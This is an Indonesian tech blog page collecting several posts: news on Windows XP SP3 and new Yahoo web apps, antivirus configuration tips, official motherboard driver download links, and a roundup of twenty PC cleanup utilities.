Microsoft akan mengumumkan Windows XP SP3 didukung NAP dari Windows Vista dan yang juga akan termasuk dalam penyelesaian Windows Server 2008. Direncanakan Microsoft akan merilis Windows XP SP3 ini pada awal tahun 2008, dan sekaligus akan menjadikan XP sebagai Sistem Operasi berumur enam tahun.(dna)

Semoga Bermanfaat

Yahoo! Luncurkan 4 Aplikasi Web Terbarunya

Penambahan aplikasi baru ini, merupakan bagian dari inisiatif Yahoo untuk membuat layanannya lebih kaya. Seperti yang diumumkan pada Desember tahun lalu, Yahoo kini membuka jalan bagi para developer luar dan berintegrasi dengan fitur-fitur dalam situs jejaring sosial.

Contohnya, aplikasi Food & Wine besutan developer Snooth. Aplikasi ini menyediakan resep dan menu makanan, serta review produk minuman anggur. Ada juga aplikasi lain bernama Green Lifestyle dari Mokugift yang memberikan tips untuk membantu pengunjung situs menjadi lebih sadar lingkungan.

Selain itu ada aplikasi Mint.com yang membantu penggunanya untuk mengatur keuangan, merancang budget dan memberikan tips berhemat. Yahoo juga menambah aplikasi dari situs blogging WordPress, sehingga pengguna bisa memposting atau mengupdate blog mereka tanpa harus keluar dari halaman Yahoo terlebih dahulu.




Yahoo Mail juga kini tampil lebih revolusioner, pengguna bisa mengakses PayPal, Picnik photo editing, dan Zumo Web storage secara langsung dari inbox. Mereka bisa minta untuk dikirimkan sejumlah uang atau menerimanya melalui PayPal. Pengguna juga bisa mengedit dan berbagi foto dengan Picnik dan kapasitas penyimpanan email akan lebih besar dengan kapasitas 100MB gratis dari Zumo.



Bagi widget yang memungkinkan untuk melihat video atau siaran televisi, Yahoo telah menambahkan channel ke YouTube dan beberapa siaran tv kabel. Keduanya sama-sama menyediakan akses ke video dari situs mereka.

Yang terakhir yang paling menarik adalah Yahoo juga menambahkan konten ke Zimbra, yaitu email open source dan piranti lunak hasil kolaborasi dengan Yahoo. Dengan aplikasi ini pengguna bisa secara otomatis menyimpan email dalam bentuk dokumen, menandai pesan penting dan melihat report yang masuk hanya dengan satu klik. (PCWorld/okezone)

Selasa, 09 Juni 2009

Tips efektif dan efisien menggunakan AntiVirus

Pengaturan standard bukan berarti yang terbaik, bahkan sering kerja komputer sangat lambat atau proses scanning komputer menjadi sangat lambat. Bagaimana agar penggunaan antivirus efektif dan efisien ? Berikut beberapa tips yang bisa kita lakukan :

Untuk Pengguna Offline

Jika komputer kita tidak tersambung ke internet atau jarang sekali koneksi ke Internet, maka ada beberapa hal yang bisa di efektifkan :

  • Matikan fasilitas Auto Update, update dilakukan manual, dengan download virus database atau ketika konek ke Internet saja.
  • Jika ada fasilitas Anti Spyware atau Email Scanner, atau fasilitas lain yang berhubungan dengan koneksi Internet, matikan saja untuk mengurangi pemakaian Memori dan CPU. Jika komputer kadang terkoneksi ke Internet, scan spyware dapat dilakukan secara manual, setiap beberapa hari atau seminggu sekali.
  • Download virus definition (update) maksimal sekitar satu minggu sekali. Meskipun tidak ada batasan tertentu, tetapi lebih sering lebih baik.

Untuk Pengguna Online

Jika komputer selalu atau sering online, maka beberapa hal yang bisa diefektifkan adalah :

  • Aktifkan Auto Update, sehari sekali sudah cukup, lebih sering lebih baik.
  • Jika ada fasilitas email scanner atau anti spyware, lebih baik diaktifkan, kecuali menggunakan program anti spyware lainnya.

Proses Scan Virus

Proses scan virus di komputer bisa memerlukan waktu cukup lama, bahkan sampai berjam-jam jika file kita sangat banyak. Agar efektif dan efisien, bisa diatur hal-hal berikut :

  • Non aktifkan (disabled) scan Archive (file yang dikompress, seperti zip,rar,cab dan sebagainya), kecuali punya banyak waktu untuk menscan virus. Karena jika ini diaktifkan proses scan bisa sangat lama. Selain itu jika ada virus didalam zip/archive maka tidak berbahaya asal file didalamnya tidak dijalankan.
  • Hindari setting untuk langsung menghapus/heal/remove file yang dianggap sebagai virus, lebih baik pilih Karantina (Move to Quarantine) atau rename. Kecuali sudah yakin bahwa file itu memang virus, bukan dokumen atau program yang terinfeksi virus.
  • Jika ada pilihan scan file-file tertentu/pilihan (smart extensions) dan semua file, maka lebih baik dipilih smart extensions, scan akan jauh lebih cepat.
  • Di bagian Scheduler Scan (Scan otomatis setiap waktu tertentu), pastikan diatur di saat-saat komputer jarang terpakai atau di matikan (non aktifkan/disabled) saja dan scan di lakukan secara manual. Karena kadang kita tidak tahu bahwa antivirus sedang melakukan scan yang bisa memakan waktu sangat lama, sehingga kerja komputer menjadi sangat lambat.
  • Jika sedang melakukan proses scan, sebaiknya tidak menjalankan program lain, apalagi yang berat. Juga pastikan untuk mematikan screensaver jika komputer ditinggal pergi.
Optimaliasasi Umum

  • Periksa Virus Vault (karantina Virus). Jika sudah terlalu banyak isinya, hapus yang benar-benar virus atau file yang sudah tidak terpakai lagi. Jika banyak file yang berukuran sama, kemungkinan itu virus, jadi dihapus saja atau tinggalkan satu saja.
  • Aktifkan fasilitas Report, dan simpan report-nya di folder yang mudah dicari.
  • Selalu aktifkan Resident Shield/Guard, karena ini yang selalu memonitor file-file setiap saat.
  • Jika tidak penting sekali, hindari pemakaian 2 antivirus atau lebih secara bersamaan.
Jika anda mempunyai tips pemakaian antivirus yang lain, silahkan ditambahkan, untuk melengkapi artikel ini. Semoga bermanfaat (ebsoft.web.id).

Daftar link download berbagai driver Motherboard

Berikut daftar link download driver berbagai vendor motherboard komputer. Saya berusaha menuliskan daftar download dari alamat (situs) resmi, sehingga lebih menjamin keamanan dan kinerjanya. Selain itu tidak diperlukan login, membership ataupun membayar, alias gratis.

• ABIT : http://www.abit.com.tw/page/en/download/download_driver.php
• ASRock : http://www.asrock.com/support/download.asp
• ASUS : http://support.asus.com/download/download.aspx?SLanguage=en-us
• BIOSTAR : http://www.biostar.com.tw/app/en-us/support/download.php
• Chaintech : http://www.chaintech.com.tw/a40_downloads.php
• DFI LANParty : http://us.dfi.com.tw/portal/CM/cmdownload
• ECS : http://www.ecs.com.tw/ECSWebSite/Downloads/
• EPoX : http://www.epox.com/USA/downloads.asp
• FoxConn : http://www.foxconnchannel.com/support/downloads.aspx
• Gigabyte : http://www.gigabyte.com.tw/Support/Default.aspx
• Intel : http://downloadcenter.intel.com/
• Jetway : http://www.jetway.com.tw/jw/download.asp
• IWill : http://www.flextronics.com/iwill/product_adns.asp
• MSI (Micro-Star International) : http://www.msi.com. Lokasi download driver :
• Next : http://www.next-board.com/drivers.php
• PCChips, lihat download vendor ECS diatas

Sebagian besar link diatas akan langsung masuk ke halaman pemilihan hardware yang dimiliki masing-masing vendor, seperti : Motherboard, VGA / Graphics card, Server/ workstation board dan lainnya. Jadi sebelum download, langkah lain yang juga penting adalah mengetahui tipe Motherboard yang digunakan.

Cara mengetahui tipe Motherboard yang terbaik adalah dengan membuka chasing komputer dan dilihat keterangannya di motherboardnya. Sebagian besar vendor akan menuliskan tipe-nya disana, baik dengan sticker atau langsung menuliskan di papan mainboardnya dengan tulisan yang cukup besar dan cukup mencolok. Berikut contohnya

Koleksi Software Cleaner

Koleksi software cleaner

Satu untuk semua.
kayaknya bermanfaat buat para pengguna komputer. berikut penelusurannya :

Komputer anda tiba-tiba menenunjukan kinerja yang semakin lama dalam mengerjakan tugasnya dan semakin menimbulkan masalah. Berikut adalah tool yang dapat membantu anda membersihkan sampah-sampah yang ada disana. Ke 20 file dibawah ini akan membuat PC anda berterimakasih kepada anda.

1. PC Decrapifier: Anda membeli PC yang baru dari toko komputer, dan anda berharap PC tersebut bersih dari segala noda? Salah!! Anda biasanya akan menemukan banyak,”craplets”, mereka akan melambatkan kinerja PC anda. PC Decraptifier secara otomatis akan membuang “crap” yang ada pada komputer baru anda. Tetapi jangan terlalu berharap bahwa ia akan membersihkan semuanya, hanya ada beberapa spesifik “crap” dan trialware yang akan dibuangnya dari komputer baru anda, seperti QuickBooks Trial, Wild Tangent Games, Dell URL Assistant dan masih banyak lagi.

2. Dedaulus System Cleaner Jika anda mencari pembersih sistem yang sederhana, mudah untuk melakukan basic cleaning, anda tidak perlu mengeluarkan uang untuk itu. Program ini dapat membersihkan temp files dan jejak dari penggunaan Internet, menemukan duplikasi file, dan membenarkan Registry error.

3. TuneUp Utilities 2007 Program ini dihargai $40 namun memiliki semua macam kelengkapan yang diperlukan untuk sebuah clean-up tool. Ia melakukan tugas-tugas seperti: membuang file yang tidak dibutuhkan, clean up dan meng-optimize registry, dan masih banyak lagi.

4. WinSettings Pro Harga sistem pembersih all-in-one ini adalah $50 namun ia dilengkapi dengan beberapa fitur tambahan. Ia akan dapat menemukan junk file, duplicate file, dan internet history, ia juga dapat membersihkan cookie yang ada.

5. Super Utilities Ini adalah sebuah pembersih all-in-one tool yang lain untuk membersihkan dan mengoptimalkan PC anda. Kelebihan dari tool kit ini adalah dia memiliki registry cleaner, defragmentation tool, fitur antispyware dan ada 27 fungsi tambahan lainnya. Anda dapat mencobanya untuk 30 hari, setelah itu jika anda setuju bahwa ini adalah produk yang baik untuk dibeli, harganya $60 saja.

6. Magic Utilities Alat ini memiliki lima fungsi yang berbeda untuk membersihkan PC anda. Pertama, untuk membunuh program pada saat start up, kedua, untuk uninstall software, ketiga, untuk menemukan junk pada hard drive anda dan membiarkan anda yang memutuskan untuk membuangnya, keempat untuk menemukan file yang berceceran, dan kelima untuk memutuskan proses yang sedang berjalan. Tidak ada yang spesial pada software ini, hanya kemudahan penggunaanya saja yang menjadi keunggulannya. Harga registrasinya $40.

7. Autoruns Alat ini memperlengkapi anda dengan informasi. Jika anda mengetahui software mana yang secara otomatis berjalan pada saat log in, anda dapat memutuskan mana yang anda butuhkan dan mana yang tidak.

8. Security Task Manager Jika PC anda seret, anda pasti memiliki terlalu banyak program yang berjalan pada saat yang sama, dan banyak yang pastinya tidak anda ketahui. Dengan Windows Task Manager anda akan mengetahui apa yang sedang berjalan, dan memberikan anda penjelasan terperinci tentang apa yang seedang terjadi.

9. Duplicate Music Files Finder Anda memiliki disk yang penuh dengan MP3 atau file musik lainnya? Jika ya, anda kemungkinan besar juga memiliki file MP3 yang dobel. Mencari file yang sama mungkin cukup membuang waktu, karena anda mungkin memiliki file yang sama dengan nama yang berbeda. Dengan alat ini anda akan mendapatkan pencarian yang lebih spesifik dengan membandingkan file size, CRC check, dan ID3 (MP3 meta data) untuk membantu anda mencari file yang memiliki duplikat

10. Easy Duplicate Finder Jika anda telah menggunakan PC anda cukup lama. Anda akan disibukan dengan berbagai macam file yang dobel. Seperti graphics files, .doc files, media files, dll files dan anda akan terkejut dengan banyaknya jumlah file tersebut. Ini bukan saja membuang tempat pada hard disk anda, tetapi juga membuat pencarian file yang anda inginkan menjadi lebih sulit. Alat ini akan mencari anda file yang terduplikat dan menghapus yang tidak anda butuhkan. Arahkan pada hard disk anda dan pada folder yang anda mau, dan ia akan berjalan sesuai yang anda inginkan.

11. Wise Disk Cleaner PC anda memilki banyak file yang tidak diinginkan, seperti temporary internet file, log file, index file, dan backup file? Ini akan sangat membebani ruang untuk memory anda. Wise Disk Cleaner dapat mencari file ini untuk anda, dan menghapus apa yang ingin anda hapus. Anda bisa memilih untuk secara permanen menghapusnya atau menaruhnya dalam recycle bin.

12. Adblock Pro PC anda penuh dengan junk? Demikian pula hal nya dengan Internet, jika menurut anda iklan adalah junk. Jika anda bukanpenggemar iklan, anda dapat dengan mudah membunuhnya dengan Adblock Pro. Shareware seharga $20 ini bekerja lebih baik dibandingkan dengan IE 7 pop up blocker.

13. R-Wipe and Clean Tanpa sepengetahuan anda, PC menyimpan sejarah tentang aktivitas anda. Ia memiliki sejarh tentang Web yang anda kunjungi, RSS feed anda, download, program yang anda jalankan, file yang anda buka dan masih banyak lagi. Program seharga $29 ini dapat membersihkannya untuk anda, agar PC anda dapat bekerja lebih cepat.

14. Expired Cookies Cleaner Komputer anda dipenuhi dengan cookie tempat web yang pernah anda kunjungi. Cookie sebenarnya memiliki tujuan, yaitu untuk melakukan log otomatis setiap kali anda membuka suatu web. Namun seringkali cookie menjadi out of date, dan mereka tetap berada dalam PC anda. Alat ini akan mencari cookie yang sudah lama dan segera menghapusnya.

15. HackCleaner Barang gratisan ini dapat melakukan tugas yang baik seperti membersihkan junk dari PC, termasuk cookies, temporary internet file, internet toolbar, dan lain-lain. Ia juga bisa digunakan untuk membebaskan RAM ke bagian dari hard disk untuk meningkatkan kinerja PC.

16. Wise Registry Cleaner Semakin tua PC anda, semakin banyak junk yang bertumpuk disana. Program yang ditulis kurang sempurna tidak membersihkan registry sewaktu anda membersihkan mereka. Semakin banyak junk di registry, semakin jelek kinerja komputer anda. Program gratisan ini melakukan pekerjaan yang baik untuk membersihkan junk di registry anda.

17. Registry Commander Registry commander membuat kegiatan meng-edit registry menjadi lebih mudah. Namun berhati-hatilah terhadap kegiatan ini, tidak perduli dengan tool apa anda mengerjakannya, registry bisa berakibat fatal.

18. AusLogics Registry Defrag Walaupun Windows Registry anda relatif bersih, kinerja komputer anda mungkin masih akan lama. Hal ini disebabkan oleh hard disk anda yang ter-fragment setiap waktu. Alat gratisan ini hadir untuk menyelesaikan permasalahan yang ada. Ia akan memperkecil size dari registry anda dan juga meningkatkan efiktivitas dari defragmentasi anda.

19. Driver Sweeper Anda telah rajin meng-update sistem anda. Secara teori sistem anda akan ada pada kondisi terbaiknya dan berjalan dengan kecepatan tinggi. Namun ada sedikit masalah: jika anda tidak menyingkiran driver tua anda dengan baik, sitem akan menjadi tidak stabil, berjalan lebih lama, dan crash. Driver Sweeper ada untuk mengatasi hal ini. Ia akan melakukan sweeping kepada sistem anda, menemukan driver lama anda, dan membiarkan anda membuangnya. Dan untuk tujuan keamanan, dia juga akan mem-back upnya. jadi anda dapat me-restorenya bila kelak anda membutuhkannya.

20. LocalCooling Alat yang satu ini tidak akan membuat PC anda lebih bersih, namun pastinya akan membuat dunia lebih bersih. Alat gratisan ini akan menghemat penggunaan listrik dari PC anda, jadi PC anda akan memberikan kontribusi yang lebih sedikit terhadap pemanasan global.